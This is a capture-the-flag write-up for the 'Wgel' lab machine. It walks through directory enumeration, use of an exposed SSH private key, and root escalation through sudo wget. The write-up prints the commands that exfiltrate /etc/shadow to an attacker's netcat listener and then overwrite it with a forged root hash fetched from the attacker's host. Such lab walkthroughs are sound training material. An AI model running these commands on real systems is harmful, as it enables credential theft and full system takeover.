Wgel CTF
Target IP: 10.10.225.134
We have: 22/tcp open ssh OpenSSH 7.2p2 80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
Let's check the site. Apache Default Page.
There are some high riks vulnerabilities in the apache version.
Gobuster gave us some interesting results. We have got the sitemap
Now I ran gobuster to the sitemap.
/.ssh (Status: 301) [Size: 319] [--> http://10.10.192.81/sitemap/.ssh/]
/css (Status: 301) [Size: 318] [--> http://10.10.192.81/sitemap/css/]
/fonts (Status: 301) [Size: 320] [--> http://10.10.192.81/sitemap/fonts/]
/images (Status: 301) [Size: 321] [--> http://10.10.192.81/sitemap/images/]
/js (Status: 301) [Size: 317] [--> http:///sitemap/js/]
This is what gobuster found. Most interesting for me right now is the .ssh forlder. Looks like we should use the stupid browser.
Man! Looks like we got the private key.
I tried to connect but it would be better if we had the username too. Let's see what we have in the images folder. Obvioulsy we have a lot of images there.
I gave the id_rsa the right privileges, but when I am trying to connect it still wants the password.
If we go to the http://$target_ip and open the source code. We can find the name Jessie in the comments. Let's try to use the name to connect to the ssh.
And here we go. In the Documents dir we can find the user's flag.
Now we need to become root.
I am going to use find / -perm -u=s -type f 2>/dev/null to check if there is any suspicious files.
sudo -l gave us some information.
https://gtfobins.github.io/gtfobins/wget/#sudo I found something that we need on this website.
We are gonig to overwrite the /etc/shadow file.
we run a listener:
nc -lvp 80
then using wget we send the /etc/shadow info to our listener:
sudo wget --post-file=/etc/shadow 10.2.38.40
Copy the content and create new file named shadow on my local machine.
Now we need to create a hash of password for our root user.
openssl passwd -6 -salt 'salt' 'password'
command to manually create a password for user.
Another method is to use this command:
mkpasswd --method=SHA-512 --stdin
I created the hash and I am going to write it as password for the root user.
Shadow file, root user.
Now we can start python3 -m http.server and then wget the new shadow file from our local machine.
Command to overwrite the shadow file with wget:
sudo wget http://10.2.38.40:8000/shadow -O /etc/shadow
Now we can try to change current user to root. And here we go!
Take the flag and go to sleep :)